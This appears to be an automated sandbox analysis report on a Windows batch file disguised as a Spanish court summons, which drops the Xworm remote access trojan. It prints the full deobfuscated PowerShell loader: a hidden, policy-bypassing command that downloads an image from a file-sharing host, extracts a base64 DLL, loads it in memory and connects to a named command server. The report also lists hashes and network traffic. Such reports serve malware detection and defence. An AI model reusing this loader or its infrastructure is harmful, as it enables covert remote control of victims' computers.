Analysis

  • max time kernel
    173s
  • max time network
    180s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 20:46

General

  • Target

    En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat

  • Size

    210KB

  • MD5

    ed413cc9ec12454b62e10a58bb2e4213

  • SHA1

    a027ce72c41eb753d1e275eb955ddf8b323a84de

  • SHA256

    81fe1c16a0c91c2ce2b997dfa0d6c3ecb03af6a9494024d273b902b2f088ca6e

  • SHA512

    7ff5eb191033f5770f180ab3111fe6402cc9ac71540c6a6eda2b32e50a57e5b267a7006ce45f82b8e578962a5a2b7a605eda8cb525430fe889b4d941dd11f9cf

  • SSDEEP

    6144:vZ5PFlZSyyiQNfwJIJ9wNfX3T7jVrDjDb7bLw8:B

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$base64url = "aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=="
2
$url = "https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f"
3
$webclient = new-object system.net.webclient
4
$imagebytes = $webclient.downloaddata("https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f")
5
$imagetext = ([system.text.encoding]::ascii).getstring($imagebytes)
6
$startflag = "<<BASE64_START>>"
7
$endflag = "<<BASE64_END>>"
8
$startindex = $imagetext.indexof("<<BASE64_START>>")
9
$endindex = $imagetext.indexof("<<BASE64_END>>")
10
$startindex -ge 0 -and $endindex -gt $startindex
11
$startindex = $startflag.length
12
$base64length = $endindex - $startindex
13
$base64command = $imagetext.substring($startindex, $base64length)
14
$dllbytes = [convert]::frombase64string($base64command)
15
$assembly = [system.reflection.assembly]::load($dllbytes)
16
[stub.main]::main("barrioantioquia.webredirect.org", "6095")
17
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

exe.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\En este sentido, se le hace un llamado de atención para que se presente ante el Juez del Circuito T.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('barrioantioquia.webredirect.org', '6095');"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5012

Network

  • flag-us
    DNS
    3105.filemail.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    3105.filemail.com
    IN A
    Response
    3105.filemail.com
    IN CNAME
    ip.3105.filemail.com
    ip.3105.filemail.com
    IN A
    193.30.119.205
  • flag-no
    GET
    https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
    powershell.exe
    Remote address:
    193.30.119.205:443
    Request
    GET /api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f HTTP/1.1
    Host: 3105.filemail.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Length: 5353433
    Content-Type: image/jpeg
    Last-Modified: Wed, 06 Nov 2024 00:04:10 GMT
    Accept-Ranges: bytes
    ETag: 078712b9591b4fb096f2292adece0898
    X-Transfer-ID: ibybhsntnwgamsn
    Content-Disposition: attachment; filename=DetahNotwe.jpg
    Date: Tue, 12 Nov 2024 20:46:10 GMT
  • flag-us
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    205.119.30.193.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    205.119.30.193.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    barrioantioquia.webredirect.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    barrioantioquia.webredirect.org
    IN A
    Response
    barrioantioquia.webredirect.org
    IN A
    5.79.98.102
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    22.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    barrioantioquia.webredirect.org
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    barrioantioquia.webredirect.org
    IN A
    Response
    barrioantioquia.webredirect.org
    IN A
    5.79.98.102
  • 193.30.119.205:443
    https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
    tls, http
    powershell.exe
    112.0kB
    5.5MB
    2300
    3998

    HTTP Request

    GET https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

    HTTP Response

    200
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    160 B
    5
    4
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 5.79.98.102:6095
    barrioantioquia.webredirect.org
    powershell.exe
    260 B
    200 B
    5
    5
  • 8.8.8.8:53
    3105.filemail.com
    dns
    powershell.exe
    63 B
    96 B
    1
    1

    DNS Request

    3105.filemail.com

    DNS Response

    193.30.119.205

  • 8.8.8.8:53
    13.86.106.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    13.86.106.20.in-addr.arpa

  • 8.8.8.8:53
    205.119.30.193.in-addr.arpa
    dns
    73 B
    131 B
    1
    1

    DNS Request

    205.119.30.193.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    barrioantioquia.webredirect.org
    dns
    powershell.exe
    77 B
    93 B
    1
    1

    DNS Request

    barrioantioquia.webredirect.org

    DNS Response

    5.79.98.102

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    barrioantioquia.webredirect.org
    dns
    powershell.exe
    77 B
    93 B
    1
    1

    DNS Request

    barrioantioquia.webredirect.org

    DNS Response

    5.79.98.102

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1optzohf.5ya.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/5012-2-0x00007FFD35CE3000-0x00007FFD35CE5000-memory.dmp

    Filesize

    8KB

  • memory/5012-8-0x00000179B9030000-0x00000179B9052000-memory.dmp

    Filesize

    136KB

  • memory/5012-13-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-14-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-15-0x00000179BB550000-0x00000179BB8E4000-memory.dmp

    Filesize

    3.6MB

  • memory/5012-16-0x00007FFD35CE3000-0x00007FFD35CE5000-memory.dmp

    Filesize

    8KB

  • memory/5012-17-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

  • memory/5012-18-0x00007FFD35CE0000-0x00007FFD367A1000-memory.dmp

    Filesize

    10.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.